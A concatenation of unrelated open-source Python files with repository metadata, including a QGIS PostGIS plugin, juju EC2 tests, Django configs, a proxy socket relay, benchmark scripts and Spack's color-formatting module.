def tableRulesFactory(self, row, table):
return PGTableRule(row, table)
def info(self):
from .info_model import PGTableInfo
return PGTableInfo(self)
def tableDataModel(self, parent):
from .data_model import PGTableDataModel
return PGTableDataModel(self, parent)
def delete(self):
self.aboutToChange.emit()
if self.isView:
ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm')
else:
ret = self.database().connector.deleteTable((self.schemaName(), self.name))
if not ret:
self.deleted.emit()
return ret
class PGVectorTable(PGTable, VectorTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-4], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:]
def info(self):
from .info_model import PGVectorTableInfo
return PGVectorTableInfo(self)
def runAction(self, action):
if PGTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
class PGRasterTable(PGTable, RasterTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-6], db, schema)
RasterTable.__init__(self, db, schema)
self.geomColumn, self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:]
self.geomType = 'RASTER'
def info(self):
from .info_model import PGRasterTableInfo
return PGRasterTableInfo(self)
def gdalUri(self, uri=None):
if not uri:
uri = self.database().uri()
schema = (u'schema=%s' % self.schemaName()) if self.schemaName() else ''
dbname = (u'dbname=%s' % uri.database()) if uri.database() else ''
host = (u'host=%s' % uri.host()) if uri.host() else ''
user = (u'user=%s' % uri.username()) if uri.username() else ''
passw = (u'password=%s' % uri.password()) if uri.password() else ''
port = (u'port=%s' % uri.port()) if uri.port() else ''
# Find first raster field
col = ''
for fld in self.fields():
if fld.dataType == "raster":
col = u'column=%s' % fld.name
break
gdalUri = u'PG: %s %s %s %s %s mode=2 %s %s table=%s' % \
(dbname, host, user, passw, port, schema, col, self.name)
return gdalUri
def mimeUri(self):
# QGIS has no provider for PGRasters, let's use GDAL
uri = u"raster:gdal:%s:%s" % (self.name, re.sub(":", "\:", self.gdalUri()))
return uri
def toMapLayer(self):
from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials
rl = QgsRasterLayer(self.gdalUri(), self.name)
if not rl.isValid():
err = rl.error().summary()
uri = QgsDataSourceUri(self.database().uri())
conninfo = uri.connectionInfo(False)
username = uri.username()
password = uri.password()
for i in range(3):
(ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err)
if ok:
uri.setUsername(username)
uri.setPassword(password)
rl = QgsRasterLayer(self.gdalUri(uri), self.name)
if rl.isValid():
break
if rl.isValid():
rl.setContrastEnhancement(QgsContrastEnhancement.StretchToMinimumMaximum)
return rl
class PGTableField(TableField):
def __init__(self, row, table):
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, self.modifier, self.notNull, self.hasDefault, self.default, typeStr = row
self.primaryKey = False
# get modifier (e.g. "precision,scale") from formatted type string
trimmedTypeStr = typeStr.strip()
regex = QRegExp("\((.+)\)$")
startpos = regex.indexIn(trimmedTypeStr)
if startpos >= 0:
self.modifier = regex.cap(1).strip()
else:
self.modifier = None
# find out whether fields are part of primary key
for con in self.table().constraints():
if con.type == TableConstraint.TypePrimaryKey and self.num in con.columns:
self.primaryKey = True
break
class PGTableConstraint(TableConstraint):
def __init__(self, row, table):
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.isDefferable, self.isDeffered, columns = row[:5]
self.columns = list(map(int, columns.split(' ')))
if constr_type_str in TableConstraint.types:
self.type = TableConstraint.types[constr_type_str]
else:
self.type = TableConstraint.TypeUnknown
if self.type == TableConstraint.TypeCheck:
self.checkSource = row[5]
elif self.type == TableConstraint.TypeForeignKey:
self.foreignTable = row[6]
self.foreignOnUpdate = TableConstraint.onAction[row[7]]
self.foreignOnDelete = TableConstraint.onAction[row[8]]
self.foreignMatchType = TableConstraint.matchTypes[row[9]]
self.foreignKeys = row[10]
class PGTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, columns, self.isUnique = row
self.columns = list(map(int, columns.split(' ')))
class PGTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.function, self.type, self.enabled = row
class PGTableRule(TableRule):
def __init__(self, row, table):
TableRule.__init__(self, table)
self.name, self.definition = row
|
drnextgis/QGIS
|
python/plugins/db_manager/db_plugins/postgis/plugin.py
|
Python
|
gpl-2.0
| 14,923 | 0.002278 |
from yaml import dump
from twisted.internet.defer import succeed, fail
from txaws.s3.exception import S3Error
from juju.lib.testing import TestCase
from juju.providers.ec2.tests.common import EC2TestMixin
class EC2StateTest(TestCase, EC2TestMixin):
def setUp(self):
EC2TestMixin.setUp(self)
super(EC2StateTest, self).setUp()
def test_save(self):
"""
When passed some juju ec2 machine instances and asked to save,
the machine, it will serialize the data to an s3 bucket.
"""
instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
state = dump(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
self.s3.put_object(
self.env_name, "provider-state", state),
self.mocker.result(succeed(state))
self.mocker.replay()
provider = self.get_provider()
d = provider.save_state(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
def assert_state(saved_state):
self.assertEqual(saved_state, state)
d.addCallback(assert_state)
return d
def test_save_non_existant_bucket(self):
"""
When saving instance information to S3 the EC2 provider will create a
namespaced bucket specific to the provider instance, if it does not
already exist.
"""
instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
state = dump(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
self.s3.put_object(
self.env_name, "provider-state", state),
error = S3Error("<error/>", 404)
error.errors = [{"Code": "NoSuchBucket"}]
self.mocker.result(fail(error))
self.s3.create_bucket(self.env_name)
self.mocker.result(succeed({}))
self.s3.put_object(
self.env_name, "provider-state", state),
self.mocker.result(succeed(state))
self.mocker.replay()
provider = self.get_provider()
d = provider.save_state(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
def assert_state(saved_state):
self.assertEqual(saved_state, state)
d.addCallback(assert_state)
return d
def test_load(self):
"""
The provider bootstrap will load and deserialize any saved state from
s3.
"""
self.s3.get_object(self.env_name, "provider-state")
self.mocker.result(succeed(dump({"zookeeper-instances": []})))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertEqual(value, {"zookeeper-instances": []})
d.addCallback(assert_load_value)
return d
def test_load_nonexistant_bucket(self):
"""
When loading saved state from s3, the system returns False if the
s3 control bucket does not exist.
"""
self.s3.get_object(self.env_name, "provider-state")
error = S3Error("<error/>", 404)
error.errors = [{"Code": "NoSuchBucket"}]
self.mocker.result(fail(error))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertIdentical(value, False)
d.addCallback(assert_load_value)
return d
def test_load_nonexistant(self):
"""
When loading saved state from S3, the provider bootstrap gracefully
handles the scenario where there is no saved state.
"""
self.s3.get_object(self.env_name, "provider-state")
self.mocker.result(succeed(dump([])))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertIdentical(value, False)
d.addCallback(assert_load_value)
return d
|
anbangr/trusted-juju
|
juju/providers/ec2/tests/test_state.py
|
Python
|
agpl-3.0
| 4,134 | 0 |
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'isucdc2.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('cdc.urls', namespace="cdc")),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
ISEAGE-ISU/cdc2-2015-www
|
isucdc2/urls.py
|
Python
|
mit
| 469 | 0.008529 |
"""
33. get_or_create()
``get_or_create()`` does what it says: it tries to look up an object with the
given parameters. If an object isn't found, it creates one with the given
parameters.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Person(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
birthday = models.DateField()
def __str__(self):
return '%s %s' % (self.first_name, self.last_name)
class DefaultPerson(models.Model):
first_name = models.CharField(max_length=100, default="Anonymous")
class ManualPrimaryKeyTest(models.Model):
id = models.IntegerField(primary_key=True)
data = models.CharField(max_length=100)
class Profile(models.Model):
person = models.ForeignKey(Person, primary_key=True)
class Tag(models.Model):
text = models.CharField(max_length=255, unique=True)
class Thing(models.Model):
name = models.CharField(max_length=256)
tags = models.ManyToManyField(Tag)
class Publisher(models.Model):
name = models.CharField(max_length=100)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
authors = models.ManyToManyField(Author, related_name='books')
publisher = models.ForeignKey(Publisher, related_name='books', db_column="publisher_id_column")
|
jyotsna1820/django
|
tests/get_or_create/models.py
|
Python
|
bsd-3-clause
| 1,518 | 0.000659 |
""" smashlib.plugins.cli_update
The handler for "smash --update". This will default to
using whatever branch is already checked out
"""
from fabric import api
from goulash.python import splitext, ops
from smashlib import get_smash
from smashlib.util import CLOpt
from smashlib.plugins import Plugin
from smashlib.util.events import receives_event
from smashlib.channels import C_SMASH_INIT_COMPLETE
from smashlib import data
class UpdateSmash(Plugin):
""" This plugin is responsible for doing the work whenever smash
is invoked with "--update".
"""
update = None
verbose = True # do not change, user needs some feedback
def get_cli_arguments(self):
return [
CLOpt(
args = ['--update'],
kargs = dict(default=False,
action='store_true'))
]
def use_argv(self, args):
self.update = args.update
@receives_event(C_SMASH_INIT_COMPLETE)
def consider_updating(self):
if self.update:
try:
self.run_update()
finally:
self.smash.shell.run_cell('exit')
def run_update(self):
""" """
smash_dir = data.SMASH_DIR
with api.lcd(smash_dir):
with api.settings(api.hide('warnings'), warn_only=True, quiet=True):
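                # "git diff-index --quiet HEAD --" exits with 0 when the
                # working tree is clean and 1 when there are local changes;
                # warn_only lets us inspect the return code instead of
                # aborting.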
result = api.local('git diff-index --quiet HEAD --')
changed = (1 == result.return_code)
if changed:
error = "aborting due to local changes in {0}"
self.report(error.format(smash_dir))
else:
api.local('git pull')
api.local('./bin/pip install -r requirements.txt')
def load_ipython_extension(ip):
""" called by %load_ext magic """
return UpdateSmash(get_ipython()).install()
|
mattvonrocketstein/smash
|
smashlib/plugins/cli_update.py
|
Python
|
mit
| 1,850 | 0.004324 |
from django.core.management.base import BaseCommand
from lizard_blockbox import import_helpers
class Command(BaseCommand):
args = ""
help = "Merge the measure shapes to get one json."
def handle(self, *args, **kwargs):
import_helpers.merge_measures_blockbox(self.stdout)
|
lizardsystem/lizard-blockbox
|
lizard_blockbox/management/commands/merge_measures_blockbox.py
|
Python
|
gpl-3.0
| 294 | 0 |
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
mats = UnwrapElement(IN[0])
colorlist = list()
glowlist = list()
classlist = list()
shinylist = list()
smoothlist = list()
translist = list()
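# Collect each material's class, color, glow flag, shininess, smoothness and
# transparency into parallel lists, returned together as a tuple below.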
for mat in mats:
colorlist.append(mat.Color)
if mat.Glow:
glowlist.append(True)
else:
glowlist.append(False)
classlist.append(mat.MaterialClass)
shinylist.append(mat.Shininess)
smoothlist.append(mat.Smoothness)
translist.append(mat.Transparency)
OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist)
|
andydandy74/ClockworkForDynamo
|
nodes/1.x/python/Material.Properties.py
|
Python
|
mit
| 540 | 0.02963 |
# The MIT License (MIT)
#
# Copyright shifvb 2015
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import select
def read_write(client, target):
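    # Relay data between the client and target sockets using select(): copy
    # whatever either side sends to the other, and stop after time_out_max
    # consecutive 3-second polls with no traffic, or on a socket error.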
time_out_max = 20
socs = [client, target]
count = 0
while 1:
count += 1
(recv, _, error) = select.select(socs, [], socs, 3)
if error:
break
if recv:
for in_ in recv:
data = in_.recv(8192)
if in_ is client:
out = target
else:
out = client
if data:
# # debug
# if out == target:
# print('client->server {}\n'.format(data))
# else:
# print('server->client {}\n'.format(data))
out.send(data)
count = 0
if count == time_out_max:
break
|
shifvb/DarkChina
|
http_proxy/tools/async_IO.py
|
Python
|
mit
| 1,931 | 0.000518 |
import sys
import random
import collections
import itertools
import bisect
# @include
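# Build the prefix sums of the probabilities, draw a uniform random number in
# [0, 1), and binary-search (bisect) for the interval it lands in; the value
# owning that interval is returned, so each value is produced with its
# requested probability.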
def nonuniform_random_number_generation(values, probabilities):
prefix_sum_of_probabilities = (
[0.0] + list(itertools.accumulate(probabilities)))
interval_idx = bisect.bisect(prefix_sum_of_probabilities,
random.random()) - 1
return values[interval_idx]
# @exclude
def main():
n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 50)
T = [float(i) for i in range(n)]
P = []
full_prob = 1.0
for i in range(n - 1):
pi = random.uniform(0.0, full_prob)
P.append(pi)
full_prob -= pi
P.append(full_prob)
print(*T)
print(*P)
print(nonuniform_random_number_generation(T, P))
# Test. Perform the nonuniform random number generation for n * k_times
# times and calculate the distribution of each bucket.
k_times = 100000
counts = collections.Counter(
int(nonuniform_random_number_generation(T, P))
for _ in range(n * k_times))
for i in range(n):
print(counts[i] / (n * k_times), P[i])
assert abs(counts[i] / (n * k_times) - P[i]) < 0.01
if __name__ == '__main__':
main()
|
meisamhe/GPLshared
|
Programming/MPI — AMath 483 583, Spring 2013 1.0 documentation_files/nonuniform_random_number_generation.py
|
Python
|
gpl-3.0
| 1,235 | 0 |
"""
def toLocal(dt, offset = 8):
dt: datetime
offset: default 8 china time
"""
import datetime
def toLocal(dt, offset = 8):
localDateTime = dt + datetime.timedelta(hours=offset)
return localDateTime
if __name__ == '__main__':
now = datetime.datetime.utcnow()
print now
print toLocal(now)
print now
|
pisceanfoot/py_easyXY
|
py_easyXY/datetime/tzone.py
|
Python
|
apache-2.0
| 309 | 0.038835 |
#!/usr/bin/env python3
#
# The MIT License (MIT)
#
# Copyright (C) 2015 - Francois Doray <francois.pierre-doray@polymtl.ca>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import csv
import math
import pprint
import statistics
import numpy
import re
# Utility functions.
def GetFileValues(filename):
values = []
with open(filename, 'r') as filecontent:
if 'overhead-babeltrace' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
    elif 'overhead-find' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
elif 'overhead-cpu' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)total time:\s*(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
elif 'overhead-lighttpd' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)Time taken for tests:\s*(.*) seconds.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
else:
first = True
reader = csv.reader(filecontent)
for row in reader:
if first:
first = False
continue
v = eval(row[0])
if 'overhead-mongo' in filename:
v = v / 1000000000
values.append(v)
return values
def GetXYFileValues(filename):
x = []
y = []
with open(filename, 'r') as filecontent:
first = True
reader = csv.reader(filecontent)
for row in reader:
if first:
first = False
continue
y.append(eval(row[0]))
x.append(eval(row[1]))
return {'x': x, 'y': y}
def GetXYFileStdDev(filename):
values = GetXYFileValues(filename)
grouped = {}
for i in range(0, len(values['x'])):
if values['x'][i] not in grouped:
grouped[values['x'][i]] = []
grouped[values['x'][i]].append(values['y'][i])
total_stddev = 0
for x, v in grouped.items():
stddev = math.sqrt(statistics.variance(v))
if stddev > total_stddev:
total_stddev = stddev
  return total_stddev
def GetFileMean(filename):
values = GetFileValues(filename)
return statistics.mean(values)
def GetFileStdDev(filename):
values = GetFileValues(filename)
return math.sqrt(statistics.variance(values))
def RemoveBase(values, base, numactions):
values[:] = [(value - base) / numactions for value in values]
return values
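# RemoveBase normalizes raw measurements in place: subtract the baseline run's
# value and divide by the number of actions, yielding per-action overhead.
# (It is also reused with base=0, numactions=1 as a plain pass-through.)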
# Experiment: GETPID
def SummaryGetPid(results_dir):
NUM_ACTIONS = 100000000
base_mean = GetFileMean(results_dir + '/getpid-base.csv')
emptyprobes_mean = GetFileMean(results_dir + '/getpid-emptyprobes.csv')
bookkeeping_mean = GetFileMean(results_dir + '/getpid-bookkeeping.csv')
signal_mean = GetFileMean(results_dir + '/getpid-signal.csv')
base_stddev = GetFileStdDev(results_dir + '/getpid-base.csv')
emptyprobes_stddev = GetFileStdDev(results_dir + '/getpid-emptyprobes.csv')
bookkeeping_stddev = GetFileStdDev(results_dir + '/getpid-bookkeeping.csv')
signal_stddev = GetFileStdDev(results_dir + '/getpid-signal.csv')
print('EXPERIMENT: GETPID (base stddev: {0:.1f})'.format(base_stddev / base_mean))
print('Empty probes: {0:.0f} ns (stddev={1:.1f})'.format((emptyprobes_mean - base_mean) / NUM_ACTIONS,
100 * emptyprobes_stddev / emptyprobes_mean))
print('Bookkeeping: {0:.0f} ns (stddev={1:.1f})'.format((bookkeeping_mean - base_mean) / NUM_ACTIONS,
100 * bookkeeping_stddev / bookkeeping_mean))
print('Signal: {0:.0f} ns (stddev={1:.1f})'.format((signal_mean - base_mean) / NUM_ACTIONS,
100 * signal_stddev / signal_mean))
print()
# Experiment: UST
def SummaryUST(results_dir):
NUM_ACTIONS = 100000000
base_mean = GetFileMean(results_dir + '/ust-base.csv')
tracepoint_mean = GetFileMean(results_dir + '/ust-tracepoint.csv')
tracepoint_stddev = GetFileStdDev(results_dir + '/ust-tracepoint.csv')
print('EXPERIMENT: UST TRACEPOINT')
print('UST event: {0:.0f} ns (stddev: {1:.1f})'.format((tracepoint_mean - base_mean) / NUM_ACTIONS,
100 * tracepoint_stddev / tracepoint_mean))
print('')
# Experiment: LIBUNWIND
def SummaryLibunwind(results_dir):
NUM_ACTIONS = 1
base = GetFileMean(results_dir + '/libunwind-base.csv')
minregs = GetXYFileValues(results_dir + '/libunwind-optimal-withcache.csv')
minregs_nocache = GetXYFileValues(results_dir + '/libunwind-optimal-nocache.csv')
master_nocache = GetXYFileValues(results_dir + '/libunwind-nocache.csv')
base_stddev = GetXYFileStdDev(results_dir + '/libunwind-base.csv')
minregs_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-withcache.csv')
minregs_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-nocache.csv')
master_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-nocache.csv')
minregs['y'] = RemoveBase(minregs['y'], base, NUM_ACTIONS)
minregs_nocache['y'] = RemoveBase(minregs_nocache['y'], base, NUM_ACTIONS)
master_nocache['y'] = RemoveBase(master_nocache['y'], base, NUM_ACTIONS)
minregs['x'] = RemoveBase(minregs['x'], 0, 1)
minregs_nocache['x'] = RemoveBase(minregs_nocache['x'], 0, 1)
master_nocache['x'] = RemoveBase(master_nocache['x'], 0, 1)
minregs_reg = numpy.polyfit(minregs['x'], minregs['y'], 1)
minregs_nocache_reg = numpy.polyfit(minregs_nocache['x'], minregs_nocache['y'], 1)
master_nocache_reg = numpy.polyfit(master_nocache['x'], master_nocache['y'], 1)
print('EXPERIMENT: LIBUNWIND')
print('Minimal regs, with cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_reg[0], minregs_reg[1], minregs_stddev))
print('Minimal regs, no cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_nocache_reg[0], minregs_nocache_reg[1], minregs_nocache_stddev))
print('Master, no cache : frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(master_nocache_reg[0], master_nocache_reg[1], master_nocache_stddev))
print()
# Experiment: OVERHEAD
def SummaryOverhead(results_dir):
APPS = ['cpu', 'babeltrace', 'find', 'mongo']
TESTS = ['nothing', 'kernel', 'notracing-cpusyscalls', 'ust-cpusyscalls', 'critical-cpusyscalls']
FANCY_TESTS = ['Base ',
                 'Traditional tracing                           ',
'Generating stack events / No tracing ',
'Tracing stack events ',
'Tracing stack and critical path events ']
print('EXPERIMENT: OVERHEAD')
results = {}
for app in APPS:
base = GetFileMean(results_dir + '/overhead-' + app + '/nothing.csv')
results[app] = {}
for test in TESTS:
mean = GetFileMean(results_dir + '/overhead-' + app + '/' + test + '.csv')
stddev = GetFileStdDev(results_dir + '/overhead-' + app + '/' + test + '.csv')
overhead = ((mean / base) - 1) * 100
results[app][test] = {'mean': mean, 'stddev': stddev, 'overhead': overhead}
print('TABLE: TIME')
for test_i in range(0, len(TESTS)):
line = [FANCY_TESTS[test_i]]
for app in APPS:
line.append(results[app][TESTS[test_i]]['mean'])
line.append(results[app][TESTS[test_i]]['stddev'])
print('{0}& {1:.2f} & {2:.2f} & {3:.2f} & {4:.2f} & {5:.2f} & {6:.2f} & {7:.2f} & {8:.2f} \\\\\\hline'.format(*line))
print()
print('TABLE: PERCENT')
for test_i in range(0, len(TESTS)):
line = [FANCY_TESTS[test_i]]
for app in APPS:
line.append(results[app][TESTS[test_i]]['overhead'])
print('{0}& {1:.1f} & {2:.1f} & {3:.1f} & {4:.1f} \\\\\\hline'.format(*line))
print()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Generate summary from experimental results.')
parser.add_argument('results', metavar="<path/to/results>", help='Path to results directory.')
args = parser.parse_args()
SummaryGetPid(args.results)
SummaryUST(args.results)
SummaryLibunwind(args.results)
SummaryOverhead(args.results)
|
fdoray/tracecompare-benchmark
|
scripts/summary.py
|
Python
|
gpl-3.0
| 9,109 | 0.016797 |
# Copyright (c) 2010-2013 by Yaco Sistemas <goinnn@gmail.com> or <pmartin@yaco.es>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this programe. If not, see <http://www.gnu.org/licenses/>.
try:
from django.conf.urls import include, patterns, url
except ImportError: # Django < 1.4
from django.conf.urls.defaults import include, patterns, url
urlpatterns = patterns('testing.example_extra_fields.views',
url(r'^$', 'extra_index', name='extra_index'),
url(r'^(?P<resource_id>\w+)/$', 'extra_edit', name="extra_edit"),
)
|
paridin/django-inplaceedit
|
testing/testing/example_extra_fields/urls.py
|
Python
|
lgpl-3.0
| 1,090 | 0.001835 |
# coding=utf-8
# URL: https://pymedusa.com
#
# This file is part of Medusa.
#
# Medusa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Medusa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Medusa. If not, see <http://www.gnu.org/licenses/>.
"""Custom exceptions used or raised by indexer_api"""
from tvdb_api.tvdb_exceptions import (tvdb_exception, tvdb_error, tvdb_userabort, tvdb_shownotfound, tvdb_showincomplete,
tvdb_seasonnotfound, tvdb_episodenotfound, tvdb_attributenotfound)
indexerExcepts = ["indexer_exception", "indexer_error", "indexer_userabort", "indexer_shownotfound", "indexer_showincomplete",
"indexer_seasonnotfound", "indexer_episodenotfound", "indexer_attributenotfound"]
tvdbExcepts = ["tvdb_exception", "tvdb_error", "tvdb_userabort", "tvdb_shownotfound", "tvdb_showincomplete",
"tvdb_seasonnotfound", "tvdb_episodenotfound", "tvdb_attributenotfound"]
# link API exceptions to our exception handler
indexer_exception = tvdb_exception
indexer_error = tvdb_error
indexer_userabort = tvdb_userabort
indexer_attributenotfound = tvdb_attributenotfound
indexer_episodenotfound = tvdb_episodenotfound
indexer_seasonnotfound = tvdb_seasonnotfound
indexer_shownotfound = tvdb_shownotfound
indexer_showincomplete = tvdb_showincomplete
|
Thraxis/pymedusa
|
sickbeard/indexers/indexer_exceptions.py
|
Python
|
gpl-3.0
| 1,776 | 0.003378 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This file implements an expression syntax, similar to ``printf``, for adding
ANSI colors to text.
See ``colorize()``, ``cwrite()``, and ``cprint()`` for routines that can
generate colored output.
``colorize`` will take a string and replace all color expressions with
ANSI control codes. If the ``isatty`` keyword arg is set to False, then
the color expressions will be converted to null strings, and the
returned string will have no color.
``cwrite`` and ``cprint`` are equivalent to ``write()`` and ``print()``
calls in python, but they colorize their output. If the ``stream`` argument is
not supplied, they write to ``sys.stdout``.
Here are some example color expressions:
========== ============================================================
Expression Meaning
========== ============================================================
@r Turn on red coloring
@R Turn on bright red coloring
@*{foo} Bold foo, but don't change text color
@_{bar} Underline bar, but don't change text color
@*b Turn on bold, blue text
@_B Turn on bright blue text with an underline
@. Revert to plain formatting
@*g{green} Print out 'green' in bold, green text, then reset to plain.
@*ggreen@. Print out 'green' in bold, green text, then reset to plain.
========== ============================================================
The syntax consists of:
========== =================================================
color-expr '@' [style] color-code '{' text '}' | '@.' | '@@'
style '*' | '_'
color-code [krgybmcwKRGYBMCW]
text .*
========== =================================================
'@' indicates the start of a color expression. It can be followed
by an optional * or _ that indicates whether the font should be bold or
underlined. If * or _ is not provided, the text will be plain. Then
an optional color code is supplied. This can be [krgybmcw] or [KRGYBMCW],
where the letters map to black(k), red(r), green(g), yellow(y), blue(b),
magenta(m), cyan(c), and white(w). Lowercase letters denote normal ANSI
colors and capital letters denote bright ANSI colors.
Finally, the color expression can be followed by text enclosed in {}. If
braces are present, only the text in braces is colored. If the braces are
NOT present, then just the control codes to enable the color will be output.
The console can be reset later to plain text with '@.'.
To output an @, use '@@'. To output a } inside braces, use '}}'.
"""
import re
import sys
from contextlib import contextmanager
class ColorParseError(Exception):
"""Raised when a color format fails to parse."""
def __init__(self, message):
super(ColorParseError, self).__init__(message)
# Text styles for ansi codes
styles = {'*': '1', # bold
'_': '4', # underline
None: '0'} # plain
# Dim and bright ansi colors
colors = {'k': 30, 'K': 90, # black
'r': 31, 'R': 91, # red
'g': 32, 'G': 92, # green
'y': 33, 'Y': 93, # yellow
'b': 34, 'B': 94, # blue
'm': 35, 'M': 95, # magenta
'c': 36, 'C': 96, # cyan
'w': 37, 'W': 97} # white
# Regex to be used for color formatting
color_re = r'@(?:@|\.|([*_])?([a-zA-Z])?(?:{((?:[^}]|}})*)})?)'
# Mapping from color arguments to values for tty.set_color
color_when_values = {
'always': True,
'auto': None,
'never': False
}
# Force color; None: Only color if stdout is a tty
# True: Always colorize output, False: Never colorize output
_force_color = None
def _color_when_value(when):
"""Raise a ValueError for an invalid color setting.
Valid values are 'always', 'never', and 'auto', or equivalently,
True, False, and None.
"""
if when in color_when_values:
return color_when_values[when]
elif when not in color_when_values.values():
